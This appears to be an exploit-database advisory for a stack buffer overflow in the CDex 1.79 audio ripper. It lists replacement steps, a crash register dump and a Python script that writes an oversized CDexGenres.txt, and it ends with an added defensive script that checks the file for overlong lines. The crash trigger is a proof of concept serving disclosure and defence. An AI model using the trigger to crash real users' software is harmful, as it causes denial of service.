CDex Genre 1.79 - Stack Buffer Overflow



EKU-ID: 5162 CVE: OSVDB-ID:
Author: Un_N0n Published: 2015-10-14 Verified: Verified


r'''
********************************************************************************************
# Exploit Title: CDex Genre Stack Buffer Overflow
# Date: 10/9/2015
# Exploit Author: Un_N0n
# Software Link: http://cdex.mu/download
# Version: 1.79
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Generate a file with the Python code below.
2- Go to C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
3- Replace the old CDexGenres.txt with the new CDexGenres.txt
   produced by the Python code.
4- Open CDex.exe.
~ The software will crash.
 
On further analysis, we find that it is a stack-based buffer overflow.
 
[REG-DUMP]:
EAX 00000000
ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" // May be handled, but the application still crashes.
EDX 0012F1A1 ASCII 0A,"STATUS_STA"
EBX 00749338 CDex.00749338
ESP 0012F3E8
EBP 0012F464
ESI 00000000
EDI 002C7AC8
 
EIP 779DCE96 kernel32.779DCE96
 
0012F3F4   002C7AC8
0012F3F8   002E25F8  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F3FC   002E5FD8
0012F400   002E44A0
0012F404   000003F8
0012F408   0000007F
0012F40C   0012F504
0012F410   00260000
0012F414   77C97B89  RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
0012F418   002E2580  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F41C   00001190
'''
 
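# [Code to produce CDexGenres.txt]
buffer = "A" * 66666        # one 66666-byte line with no newline
file = "CDexGenres.txt"
# Write the oversized genre file into the current directory
with open(file, 'w') as f:
    f.write(buffer)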
'''
**********************************************************************************************
'''
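
A pre-launch check for the trigger described in the steps above, added here as an example and not part of the original advisory: it streams CDexGenres.txt and flags an oversized file or an oversized line. The limits `MAX_LINE_BYTES` and `MAX_FILE_BYTES`, the function names and the sample genre names are assumptions; only the LocalCDDB location and the 66666-byte single line come from the page.

```python
# Added example, not from the advisory: flag a CDexGenres.txt that should not
# be handed to CDex 1.79. The limits below are assumptions, not CDex values.
import os
import tempfile

MAX_LINE_BYTES = 256        # assumed ceiling for one genre entry
MAX_FILE_BYTES = 64 * 1024  # assumed ceiling for the whole file


def default_genre_path():
    """Per-user location named in the advisory's steps (Windows only)."""
    base = os.environ.get("LOCALAPPDATA", "")
    return os.path.join(base, "CDex", "LocalCDDB", "CDexGenres.txt")


def audit_genre_file(path, max_line=MAX_LINE_BYTES, max_file=MAX_FILE_BYTES):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    size = os.path.getsize(path)
    if size > max_file:
        findings.append(f"file is {size} bytes (limit {max_file})")
    lineno, length = 1, 0
    with open(path, "rb") as fh:
        # Stream in chunks so an oversized single line is never buffered whole.
        while chunk := fh.read(4096):
            for byte in chunk:
                if byte == 0x0A:                # LF ends the current line
                    lineno, length = lineno + 1, 0
                elif byte != 0x0D:              # skip the CR of a CRLF pair
                    length += 1
                    if length == max_line + 1:  # report each long line once
                        findings.append(f"line {lineno} exceeds {max_line} bytes")
    return findings


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed samples: a short list, and the 66666-byte single line
        # that the advisory's generator writes.
        samples = {"ok.txt": b"Rock\r\nJazz\r\nBlues\r\n", "bad.txt": b"A" * 66666}
        for name, data in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(data)
            print(name, audit_genre_file(path) or "no findings")
```

Run `audit_genre_file(default_genre_path())` on a Windows host before starting CDex; any finding means the file should be restored from a known-good copy.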